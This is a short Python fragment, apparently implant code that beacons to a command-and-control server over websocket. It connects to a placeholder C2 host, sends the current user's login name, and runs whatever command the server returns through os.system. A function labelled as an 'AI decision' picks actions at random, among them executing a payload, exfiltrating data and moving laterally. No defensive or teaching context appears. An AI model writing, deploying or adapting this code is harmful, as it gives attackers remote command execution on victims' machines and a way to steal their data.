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websocket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C2_WEBSOCKET = "ws://your-c2-server.com/ws"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ai_decision():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options = ["execute payload", "exfiltrate data", "sleep", "move laterally"]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random.choice(options)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beacon():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ws = websocket.WebSocket()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ws.connect(C2_WEBSOCKET)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ws.send(json.dumps({"agent": os.getlogin(), "decision": ai_decision()}))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response = ws.recv()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command = json.loads(response).get("cmd", "")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command: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os.system(command)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beacon()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